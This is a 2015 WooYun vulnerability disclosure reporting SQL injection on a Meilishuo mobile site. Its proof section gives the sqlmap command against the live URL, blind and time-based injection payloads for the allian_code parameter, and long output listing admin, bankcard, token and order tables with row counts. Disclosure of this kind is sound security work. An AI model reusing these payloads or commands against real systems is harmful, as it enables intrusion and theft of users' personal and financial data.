当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114227

漏洞标题:美丽说某站SQL注入目测至少27万用户数据

相关厂商:美丽说

漏洞作者: 蛋蛋侠

提交时间:2015-05-15 10:10

修复时间:2015-06-29 10:56

公开时间:2015-06-29 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-15: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

最不喜欢动不动就问厂商要礼物的~ 靠! 他实在不给你就使劲提交漏洞!!

详细说明:

QQ截图20150515081651.png


QQ截图20150515081845.png

漏洞证明:

[root@Hacker~]# Sqlmap Sqlmap -u "http://higo.meilishuo.com/hgwap/index.php/seller/discover?allian_code=543410ce6c2ebee" -D higo --count --threads 10
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all a
[*] starting at 08:12:43
[08:12:44] [INFO] resuming back-end DBMS 'mysql'
[08:12:44] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: allian_code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: allian_code=543410ce6c2ebee' AND 5563=5563 AND 'iYSA'='iYSA
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: allian_code=543410ce6c2ebee' AND SLEEP(5) AND 'zPNY'='zPNY
---
[08:12:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[08:12:44] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[08:12:44] [INFO] fetching tables for database: 'higo'
[08:12:44] [INFO] fetching number of tables for database 'higo'
[08:12:44] [INFO] resumed: 168
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 10
[08:12:44] [INFO] resumed: TBL_ADMINS
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 18
[08:12:44] [INFO] resumed: TBL_ADMIN_FUNCTION
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 22
[08:12:44] [INFO] resumed: TBL_ADMIN_FUNCTION_CAT
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 13
[08:12:44] [INFO] resumed: TBL_ADMIN_LOG
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 4
[08:12:44] [INFO] resumed: ouid
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 6
[08:12:44] [INFO] resumed: p_logs
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 8
[08:12:44] [INFO] resumed: push_log
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 14
[08:12:44] [INFO] resumed: t_country_code
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 21
[08:12:44] [INFO] resumed: t_pandora_abroad_shop
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 29
[08:12:44] [INFO] resumed: t_pandora_abroad_withdraw_log
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 17
[08:12:44] [INFO] resumed: t_pandora_account
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 26
[08:12:44] [INFO] resumed: t_pandora_account_bankcard
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 34
[08:12:44] [INFO] resumed: t_pandora_account_bankcard_history
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 25
[08:12:44] [INFO] resumed: t_pandora_account_connect
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 23
[08:12:44] [INFO] resumed: t_pandora_account_group
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 33
[08:12:44] [INFO] resumed: t_pandora_account_group_expansion
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 30
[08:12:44] [INFO] resumed: t_pandora_account_group_notice
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 24
[08:12:44] [INFO] resumed: t_pandora_account_invite
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 23
[08:12:44] [INFO] resumed: t_pandora_account_token
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 17
[08:12:44] [INFO] resumed: t_pandora_address
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 15
[08:12:44] [INFO] resumed: t_pandora_admin
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 14
[08:12:44] [INFO] resumed: t_pandora_bank
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 33
[08:12:44] [INFO] resumed: t_pandora_basic_events_statistics
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 32
[08:12:44] [INFO] resumed: t_pandora_basic_goods_statistics
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 16
[08:12:44] [INFO] resumed: t_pandora_bigger
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 24
[08:12:44] [INFO] resumed: t_pandora_bigger_comment
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 14
[08:12:44] [INFO] resumed: t_pandora_bill
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 22
[08:12:44] [INFO] resumed: t_pandora_bill_balance
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 22
[08:12:44] [INFO] resumed: t_pandora_bill_summary
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 23
[08:12:44] [INFO] resumed: t_pandora_bill_withdraw
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 15
[08:12:44] [INFO] resumed: t_pandora_board
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 21
[08:12:44] [INFO] resumed: t_pandora_board_goods
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 15
[08:12:44] [INFO] resumed: t_pandora_brand
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 24
[08:12:44] [INFO] resumed: t_pandora_brand_category
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 21
[08:12:44] [INFO] resumed: t_pandora_brand_goods
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 15
[08:12:44] [INFO] resumed: t_pandora_buyer
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 23
[08:12:44] [INFO] resumed: t_pandora_buyer_connect
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 27
[08:12:44] [INFO] resumed: t_pandora_buyer_recruitment
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 23
[08:12:44] [INFO] resumed: t_pandora_buyer_session
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 18
[08:12:44] [INFO] resumed: t_pandora_buyersdb
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 18
[08:12:44] [INFO] resumed: t_pandora_category
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 27
[08:12:44] [INFO] resumed: t_pandora_category_material
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 34
[08:12:44] [INFO] resumed: t_pandora_category_recommend_goods
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 23
[08:12:44] [INFO] resumed: t_pandora_category_size
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 28
[08:12:44] [INFO] resumed: t_pandora_category_whitelist
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 15
[08:12:44] [INFO] resumed: t_pandora_color
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 22
[08:12:44] [INFO] resumed: t_pandora_country_code
[08:12:44] [INFO] retrieving the length of query output
[08:12:44] [INFO] resumed: 16
[08:12:45] [INFO] resumed: t_pandora_coupon
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_coupon_batch
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 27
[08:12:45] [INFO] resumed: t_pandora_coupon_collectlog
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_coupon_goods
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 27
[08:12:45] [INFO] resumed: t_pandora_coupon_statistics
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_coupon_usedlog
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 18
[08:12:45] [INFO] resumed: t_pandora_currency
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_dimension
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_dimension_shop
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 15
[08:12:45] [INFO] resumed: t_pandora_event
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 21
[08:12:45] [INFO] resumed: t_pandora_event_goods
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_event_item
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_event_show
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 26
[08:12:45] [INFO] resumed: t_pandora_event_show_goods
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 18
[08:12:45] [INFO] resumed: t_pandora_eventgmv
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 16
[08:12:45] [INFO] resumed: t_pandora_events
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_events_expic
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 29
[08:12:45] [INFO] resumed: t_pandora_exp_platform_region
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 25
[08:12:45] [INFO] resumed: t_pandora_express_company
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 26
[08:12:45] [INFO] resumed: t_pandora_express_tracking
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_fairy_log
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 27
[08:12:45] [INFO] resumed: t_pandora_fairy_log_failure
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 18
[08:12:45] [INFO] resumed: t_pandora_favorite
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 30
[08:12:45] [INFO] resumed: t_pandora_final_wap_statistics
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 17
[08:12:45] [INFO] resumed: t_pandora_friends
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 15
[08:12:45] [INFO] resumed: t_pandora_goods
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_goods_category
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_goods_connect
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_goods_keywords
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 26
[08:12:45] [INFO] resumed: t_pandora_goods_limitation
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 21
[08:12:45] [INFO] resumed: t_pandora_goods_price
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_goods_seckill
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_goods_sku
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_goods_tag
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_group_banner
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_group_keywords
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 21
[08:12:45] [INFO] resumed: t_pandora_home_banner
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_hot_keywords
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 31
[08:12:45] [INFO] resumed: t_pandora_hot_keywords_category
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_id_wrapper
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 15
[08:12:45] [INFO] resumed: t_pandora_image
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 16
[08:12:45] [INFO] resumed: t_pandora_invite
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_invite_simple
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 17
[08:12:45] [INFO] resumed: t_pandora_inviter
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_login_tips
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 18
[08:12:45] [INFO] resumed: t_pandora_material
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 21
[08:12:45] [INFO] resumed: t_pandora_mls_address
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_mls_goods
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_mls_goods_prop
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_mls_higo_order
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_mls_open_token
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_mls_order
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 27
[08:12:45] [INFO] resumed: t_pandora_mls_order_freight
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_mls_user_info
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 15
[08:12:45] [INFO] resumed: t_pandora_order
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_order_express
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_order_item
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 25
[08:12:45] [INFO] resumed: t_pandora_order_operation
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_order_pay
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 27
[08:12:45] [INFO] resumed: t_pandora_order_pay_confirm
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_order_pay_ref
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 21
[08:12:45] [INFO] resumed: t_pandora_order_rapid
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 27
[08:12:45] [INFO] resumed: t_pandora_order_receivepush
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_order_refund
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 26
[08:12:45] [INFO] resumed: t_pandora_order_refund_pay
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_order_remark
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_order_return
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 26
[08:12:45] [INFO] resumed: t_pandora_order_return_log
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_order_revoke
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_order_summary
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 25
[08:12:45] [INFO] resumed: t_pandora_order_vipsettle
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 28
[08:12:45] [INFO] resumed: t_pandora_pay_receipt_record
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 29
[08:12:45] [INFO] resumed: t_pandora_product_collocation
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 34
[08:12:45] [INFO] resumed: t_pandora_product_collocation_data
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 21
[08:12:45] [INFO] resumed: t_pandora_push_device
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 28
[08:12:45] [INFO] resumed: t_pandora_recommend_category
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_report_event
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 27
[08:12:45] [INFO] resumed: t_pandora_report_event_shop
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 33
[08:12:45] [INFO] resumed: t_pandora_report_event_shop_goods
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_report_log
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 21
[08:12:45] [INFO] resumed: t_pandora_sales_goods
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 26
[08:12:45] [INFO] resumed: t_pandora_sales_statistics
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 25
[08:12:45] [INFO] resumed: t_pandora_search_keywords
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_settlement
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 25
[08:12:45] [INFO] resumed: t_pandora_settlement_item
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 15
[08:12:45] [INFO] resumed: t_pandora_share
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 14
[08:12:45] [INFO] resumed: t_pandora_shop
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_shop_alliance
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 21
[08:12:45] [INFO] resumed: t_pandora_shop_change
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_shop_intro
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_shop_intro_ext
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_shop_intro_ref
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_shop_show
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 25
[08:12:45] [INFO] resumed: t_pandora_shop_show_items
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 18
[08:12:45] [INFO] resumed: t_pandora_shop_vip
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 18
[08:12:45] [INFO] resumed: t_pandora_show_tag
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 17
[08:12:45] [INFO] resumed: t_pandora_silence
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 24
[08:12:45] [INFO] resumed: t_pandora_sphinx_counter
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 20
[08:12:45] [INFO] resumed: t_pandora_statistics
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 17
[08:12:45] [INFO] resumed: t_pandora_subcate
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_syn_goods
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_syn_goods_img
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 23
[08:12:45] [INFO] resumed: t_pandora_syn_goods_sku
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 25
[08:12:45] [INFO] resumed: t_pandora_temporary_users
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 22
[08:12:45] [INFO] resumed: t_pandora_top_keywords
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 18
[08:12:45] [INFO] resumed: t_pandora_totalgmv
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 19
[08:12:45] [INFO] resumed: t_pandora_transport
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 26
[08:12:45] [INFO] resumed: t_pandora_transport_extend
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 15
[08:12:45] [INFO] resumed: t_pandora_video
[08:12:45] [INFO] retrieving the length of query output
[08:12:45] [INFO] resumed: 25
[08:12:45] [INFO] resumed: t_pandora_wap_click_goods
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 18
[08:12:46] [INFO] resumed: t_pandora_wap_stat
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 24
[08:12:46] [INFO] resumed: t_pandora_wap_statistics
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 28
[08:12:46] [INFO] resumed: t_pandora_weixin_answer_rank
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 33
[08:12:46] [INFO] resumed: t_pandora_weixin_answer_recommend
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 17
[08:12:46] [INFO] resumed: t_pandora_welfare
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 21
[08:12:46] [INFO] resumed: t_pandora_welfare_log
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 22
[08:12:46] [INFO] resumed: t_pandora_xmpp_message
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 27
[08:12:46] [INFO] resumed: t_pandora_xmpp_message_type
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 20
[08:12:46] [INFO] resumed: t_pandora_xmpp_users
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 17
[08:12:46] [INFO] resumed: tbl_admin_newlogs
[08:12:46] [INFO] retrieving the length of query output
[08:12:46] [INFO] resumed: 12
[08:12:46] [INFO] resumed: user_no_nick
[08:12:46] [INFO] resumed: 33249
[08:12:46] [INFO] resumed: 13
[08:12:46] [INFO] resumed: 270143
[08:12:46] [INFO] resumed: 41179
[08:12:46] [INFO] resumed: 9613
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 2001
[08:12:46] [INFO] resumed: 115
[08:12:46] [INFO] resumed: 3396
[08:12:46] [INFO] resumed: 6
[08:12:46] [INFO] resumed: 1750
[08:12:46] [INFO] resumed: 168262
[08:12:46] [INFO] resumed: 11
[08:12:46] [INFO] resumed: 89
[08:12:46] [INFO] resumed: 33214
[08:12:46] [INFO] resumed: 231484
[08:12:46] [INFO] resumed: 512125
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 48382
[08:12:46] [INFO] resumed: 2142
[08:12:46] [INFO] resumed: 1
[08:12:46] [INFO] resumed: 18
[08:12:46] [INFO] resumed: 7
[08:12:46] [INFO] resumed: 12920
[08:12:46] [INFO] resumed: 3908
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 124
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 622056
[08:12:46] [INFO] resumed: 443
[08:12:46] [INFO] resumed: 273487
[08:12:46] [INFO] resumed: 219037
[08:12:46] [INFO] resumed: 8
[08:12:46] [INFO] resumed: 344
[08:12:46] [INFO] resumed: 41737
[08:12:46] [INFO] resumed: 290
[08:12:46] [INFO] resumed: 94
[08:12:46] [INFO] resumed: 765
[08:12:46] [INFO] resumed: 25
[08:12:46] [INFO] resumed: 2496
[08:12:46] [INFO] resumed: 124990
[08:12:46] [INFO] resumed: 76
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 641
[08:12:46] [INFO] resumed: 8822
[08:12:46] [INFO] resumed: 110
[08:12:46] [INFO] resumed: 3678
[08:12:46] [INFO] resumed: 36175
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 1001
[08:12:46] [INFO] resumed: 4342
[08:12:46] [INFO] resumed: 109
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 1
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 298
[08:12:46] [INFO] resumed: 32
[08:12:46] [INFO] resumed: 795
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 5
[08:12:46] [INFO] resumed: 1127
[08:12:46] [INFO] resumed: 68
[08:12:46] [INFO] resumed: 5343
[08:12:46] [INFO] resumed: 11
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 1
[08:12:46] [INFO] resumed: 202
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 39134
[08:12:46] [INFO] resumed: 1126
[08:12:46] [INFO] resumed: 6
[08:12:46] [INFO] resumed: 10628
[08:12:46] [INFO] resumed: 1136
[08:12:46] [INFO] resumed: 41
[08:12:46] [INFO] resumed: 2
[08:12:46] [INFO] resumed: 4468950
[08:12:46] [INFO] resumed: 186
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 14648
[08:12:46] [INFO] resumed: 2094
[08:12:46] [INFO] resumed: 5956
[08:12:46] [INFO] resumed: 76
[08:12:46] [INFO] resumed: 18
[08:12:46] [INFO] resumed: 671
[08:12:46] [INFO] resumed: 38882
[08:12:46] [INFO] resumed: 424
[08:12:46] [INFO] resumed: 23
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 5783893
[08:12:46] [INFO] resumed: 135
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 10
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 1251
[08:12:46] [INFO] resumed: 168
[08:12:46] [INFO] resumed: 1498
[08:12:46] [INFO] resumed: 19
[08:12:46] [INFO] resumed: 33
[08:12:46] [INFO] resumed: 450
[08:12:46] [INFO] resumed: 73
[08:12:46] [INFO] resumed: 27
[08:12:46] [INFO] resumed: 26
[08:12:46] [INFO] resumed: 53
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 1126
[08:12:46] [INFO] resumed: 191
[08:12:46] [INFO] resumed: 2484
[08:12:46] [INFO] resumed: 474891
[08:12:46] [INFO] resumed: 831
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 270
[08:12:46] [INFO] resumed: 2
